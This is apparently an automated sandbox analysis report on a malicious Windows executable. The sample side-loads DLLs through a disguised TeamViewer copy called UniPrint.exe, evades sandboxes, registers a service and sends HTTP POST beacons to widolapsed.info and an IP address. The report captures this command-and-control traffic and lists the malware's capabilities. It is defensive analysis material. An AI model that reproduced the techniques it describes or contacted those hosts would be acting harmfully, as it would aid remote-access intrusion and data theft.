Windows Analysis Report wogZe27GBB.exe

Overview

General Information

Sample Name: wogZe27GBB.exe
Analysis ID: 483790
MD5: 5efc68abd7fec415e34980d95a06a66a
SHA1: 34b243a0b3e322b8983b528caa5849395360a91d
SHA256: 0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
Tags: exeMappingOOOsigned

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Creates processes via WMI
DLL side loading technique detected
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number, etc.) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
EXE planting / hijacking vulnerabilities found
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • wogZe27GBB.exe (PID: 7160 cmdline: 'C:\Users\user\Desktop\wogZe27GBB.exe' MD5: 5EFC68ABD7FEC415E34980D95A06A66A)
    • UniPrint.exe (PID: 4260 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 5356 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 4296 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5904 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 6852 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6952 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 7016 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 7080 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6484 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5248 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: wogZe27GBB.exe Virustotal: Detection: 53%
Source: wogZe27GBB.exe ReversingLabs: Detection: 62%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll ReversingLabs: Detection: 51%
Source: 0.2.wogZe27GBB.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0049B32E __EH_prolog3,CryptGenRandom,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_006F605B CryptReleaseContext,

Compliance:

Uses 32bit PE files
Source: wogZe27GBB.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\wogZe27GBB.exe EXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SAMCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: VERSION.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: msimg32.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.4:49767 version: TLS 1.2
PE / OLE file has a valid certificate
Source: wogZe27GBB.exe Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000002.707742521.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1076091636.000000006E5CC000.00000002.00020000.sdmp, svchost.exe, 00000007.00000002.1072106592.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759626756.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.762333599.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000002.776275044.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.780622367.000000006E5CC000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, nsrC1CA.tmp.0.dr
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: global traffic HTTP traffic detected:
  POST /B8C631A8/ HTTP/1.1
  Content-Length: 85991
  Content-Type: multipart/form-data; boundary=--------988836371
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: widolapsed.info
  Connection: Close
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  POST /B8C631A8/ HTTP/1.1
  Content-Length: 86008
  Content-Type: multipart/form-data; boundary=--------2871961252
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: widolapsed.info
  Connection: Close
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  POST /B8C631A8/ HTTP/1.1
  Content-Length: 85958
  Content-Type: multipart/form-data; boundary=--------2035396243
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: widolapsed.info
  Connection: Close
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master13.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: 188.172.235.146
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  POST /dout.aspx?s=12251267&p=10000001&client=DynGate HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: 188.172.235.146
  Content-Length: 3
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  POST /dout.aspx?s=12251267&p=10000002&client=DynGate HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: 188.172.235.146
  Content-Length: 500000
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: 188.172.235.146
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/
Source: UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/EM
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=100000012
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001K
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=1000
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1014947497.00000000057B2000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002.
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=100000023321935-2125563209-405306
Source: UniPrint.exe, 00000005.00000003.714775003.00000000057B2000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002Z
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGate
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGatepzm
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate
Source: UniPrint.exe, 00000005.00000002.1072952284.0000000000AE8000.00000004.00000020.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate:%
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGateZ
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGatellow
Source: wogZe27GBB.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wogZe27GBB.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: svchost.exe, 00000010.00000002.817773606.00000217C6F00000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wogZe27GBB.exe | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: svchost.exe, 00000010.00000002.817452731.00000217C68E9000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ver)
Source: UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmp | String found in binary or memory: http://crl.verisign.co
Source: UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmp | String found in binary or memory: http://crl.verisign.corl0
Source: wogZe27GBB.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wogZe27GBB.exe | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wogZe27GBB.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wogZe27GBB.exe | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wogZe27GBB.exe | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
